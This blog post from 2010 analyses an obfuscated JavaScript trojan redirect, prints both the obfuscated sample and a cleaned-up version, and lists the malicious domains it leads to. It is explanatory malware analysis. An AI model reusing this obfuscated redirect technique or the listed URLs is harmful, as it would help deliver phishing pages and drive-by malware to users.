Oh boy! Obfuscated Trojans oh my.
June 11th, 2010
New phishing/trojan JavaScripts running amok. Got this gem recently–
<script type=’text/java script’>
// Obfuscated redirect script, as quoted in the post. Only a handful of the
// statements below do anything: they decode a URL and assign it to
// document.location.href. Everything else in this listing (numbers, empty
// strings, Date objects, empty functions) is assigned and never read again.
// NOTE(review): the quote characters here are typographic, presumably changed
// by the blog's formatting, so the text will not parse exactly as shown.
// For triage: the recurring pattern is a string literal immediately followed by
// .replace(/[...]/g, <empty string>), used as a URL or as a bracket-notation
// property name. Evaluating only those replace() calls statically recovers the
// hidden strings without running the script.
function uK(){};
var kV=”;
uK.prototype = {
// f() holds the whole payload; it is invoked once, near the end, via tL.f().
f : function() {
d=4906;
var w=function(){};
var u=new Date();
var hK=function(){};
// Operative: the literal is the target URL with the filler characters ^ H ! 9 X
// interleaved. replace() strips them, leaving hxxp://lendermedia[.]com/images/z.htm
// (defanged in this comment). The URL is all lower case, so removing the
// upper-case H and X loses nothing.
var h=’hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^’.replace(/[\^H\!9X]/g, ”);
var n=new Array();
var e=function(){};
var eJ=”;
// Operative: once D, r, ], 6 and > are stripped the property name is 'location',
// so t is document.location. The name never appears in clear text, which is why
// a plain string search for it finds nothing.
t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, ”)];
this.nH=false;
eX=2280;
dF=”dF”;
var hN=function(){ return ‘hN’ };
this.g=6633;
var a=”;
dK=”";
// Operative helper: sets one property on the object it is given. The only line
// in its body that matters is the b[...]=h assignment.
function x(b){
var aF=new Array();
this.q=”;
var hKB=false;
var uN=”";
// The property name decodes to 'href' (the character class strips . B T A I),
// so this is b.href = h.
b['hIrBeTf.'.replace(/[\.BTAI]/g, ”)]=h;
this.qO=15083;
uR=”;
var hB=new Date();
s=”s”;
}
var dI=46541;
gN=55114;
this.c=”c”;
nT=”";
this.bG=false;
var m=new Date();
var fJ=49510;
// Operative: x(document.location) performs document.location.href = h, which
// navigates the page to the decoded URL.
x(t);
this.y=”";
bL=”;
var k=new Date();
var mE=function(){};
}
};
var l=22739;
// Operative: instantiate uK and call f(); nothing happens until this call.
var tL=new uK();
var p=”";
tL.f();
this.kY=false;
</script>
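Which, after you remove the huge loads of crap (the variables, dates and empty functions that are never used, plus the filler characters stripped by the replace() calls), is…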
<script type=’text/java script’>
// Cleaned-up equivalent of the sample: the same constructor-plus-prototype
// wrapper, with the unused statements removed and the strings already decoded.
function uK(){};
uK.prototype = {
f : function() {
// Redirect target.
var h=’http://lendermedia.com/images/z.htm’;
// t is assigned without var; it holds document.location.
t=document['location'];
// x() sets href on whatever object it is passed.
function x(b) { b['href']=h; }
// Net effect: document.location.href = h, so the browser leaves the current page.
x(t);
}
};
// Nothing runs until f() is called on an instance.
var tL=new uK();
tL.f();
</script>
Which is equivalent to document.location.href = http://lender media.com/images/z.htm, a page that in turn loads this code:
http://zoo jeans.ru:8080/index.php?pid=10 in an invisible iframe
http://told speak.com/ redirects here after 3s
Cute stuff, easy to decipher, but it’ll snag a lot of people since the message is directed from the originating domain back to itself, which is a bit different.